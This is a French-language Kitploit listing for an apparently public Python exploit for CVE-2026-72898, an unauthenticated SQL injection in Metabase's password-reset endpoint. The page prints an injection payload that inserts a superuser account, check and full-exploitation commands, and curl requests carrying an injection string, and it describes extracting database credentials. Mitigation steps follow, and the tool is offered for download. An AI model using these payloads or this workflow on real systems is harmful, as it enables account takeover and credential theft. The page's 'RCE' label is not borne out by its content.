Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-72898 — Exploit Python pour CVE-2026-72898, une injection SQL non authentifiée dans le point de terminaison de réinitialisation de mot de passe de Metabase qui crée des comptes administrateur et extrait les identifiants de base de données. | Kitploit
Outils/GitHubGitHub/34zy/cve-2026-72898
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'IntrusionRed TeamingSécurité des Bases de Données
GitHub34zy/cve-2026-72898

CVE-2026-72898

Exploit Python pour CVE-2026-72898, une injection SQL non authentifiée dans le point de terminaison de réinitialisation de mot de passe de Metabase qui crée des comptes administrateur et extrait les identifiants de base de données.

il y a 6h 12mPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection SQL RCE dans Metabase

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Injection SQL non authentifiée dans le point de terminaison /api/session/reset_password de Metabase. Crée des comptes administrateurs et extrait les identifiants de base de données.

Affecté : v58.0 - v63.3 | Corrigé : v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Démarrage rapide

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

La vulnérabilité

Concaténation de chaînes dans la requête SQL :

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

Charge utile d'attaque :

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Utilisation

Vérification uniquement (sans modification) :

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Exploitation complète :

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Test manuel :

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

Ce qu'il fait

  1. Détecte l'instance Metabase (SQLi basée sur des booléens)
  2. Crée un utilisateur administrateur via injection SQL
  3. S'authentifie avec le nouvel administrateur
  4. Extrait les identifiants de la base de données connectée
  5. Vérifie la compromission complète du système

Impact

  • Accès administrateur non authentifié
  • Extraction des identifiants de base de données
  • Compromission de la base de données connectée
  • Contrôle total de l'application

Atténuation

MAINTENANT :

  • Mettre à niveau vers la version corrigée
  • Bloquer /api/session/reset_password via WAF
  • Auditer les comptes administrateurs pour détecter des ajouts non autorisés
  • Renouveler tous les identifiants de base de données

PLUS TARD :

  • Utiliser des requêtes paramétrées
  • Ajouter une validation des entrées
  • Implémenter l'authentification sur tous les points de terminaison sensibles
  • Activer la journalisation des requêtes SQL

Liens

  • GitHub Advisory
  • NVD CVE Entry

Utilisation autorisée uniquement. Tout accès non autorisé est illégal.

Télécharger l’outil